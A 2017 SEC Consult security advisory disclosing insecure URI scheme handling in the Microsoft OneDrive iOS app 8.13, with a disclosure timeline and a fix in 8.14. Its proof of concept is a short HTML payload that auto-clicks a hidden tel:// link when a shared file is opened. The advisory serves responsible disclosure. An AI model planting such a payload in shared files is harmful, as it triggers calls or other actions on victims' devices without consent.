Insecure Handling Of URI Schemes

A short demo video is available here:

youtu.be/0jZdM9peVSk

 

 

SEC Consult Vulnerability Lab Security Advisory < 20170510-0 >

=======================================================================

title: Insecure Handling Of URI Schemes

product: Microsoft OneDrive iOS App

vulnerable version: 8.13

fixed version: 8.14

impact: Medium

homepage: onedrive.live.com

found: 2017-04-10

by: S. Tripathy (Office Singapore)

SEC Consult Vulnerability Lab

 

An integrated part of SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 

www.sec-consult.com

 

=======================================================================

 

Vendor description:

-------------------

"Do more wherever you go with Microsoft OneDrive. Get to and share your

documents, photos, and other files from your iOS device, computer (PC or

Mac), and any other devices you use. Use the Office mobile apps to stay

productive and work together, no matter where you are. The OneDrive app

for iOS lets you easily work with your personal and work files when

you're on the go."

 

Source: itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958

 

 

Business recommendation:

------------------------

SEC Consult recommends to implement a proper validation to handle the URI

schemes. Always ask for user permission before calling an external URI scheme.

 

 

Vulnerability overview/description:

-----------------------------------

1) Insecure Handling of URI Schemes

 

Due to the lack of URI schemes validation any external URI scheme can be

invoked by the Microsoft OneDrive iOS application with out any user

interaction.

 

 

Proof of concept:

-----------------

1) Insecure Handling of URI Schemes

 

An attacker can upload and share a malicious HTML file to invoke an

external URI scheme. Once the file is accessed by any OneDrive user with

an iOS device, the external URI scheme will be invoked automatically.

 

Example of a malicious HTML file:

<html>
<body>
<a id="callme" href="tel://1-xxx-xxx-xxx" style="display:none">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>

 

 

Vulnerable / tested versions:

-----------------------------

The following version is affected by the identified vulnerability which

was the most recent version at the time of discovery:

 

Microsoft OneDrive iOS application v8.13

 

 

Vendor contact timeline:

------------------------

2017-04-11: Contacting vendor through secure@microsoft.com

2017-04-12: Vendor confirmed the vulnerability.

2017-04-21: Vendor released the updated version.

2017-05-10: Public release of advisory.

 

 

Solution:

---------

SEC Consult recommends to implement a proper validation to handle

the URI schemes. Always ask for user permission before calling a URI scheme.

 

Update to OneDrive v8.14

itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958

 

 

Workaround:

-----------

None

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

SEC Consult Vulnerability Lab

 

SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application www.sec-consult.com/en/Career.htm

 

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices www.sec-consult.com/en/About/Contact.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

EOF Siddhartha Tripathy / @2017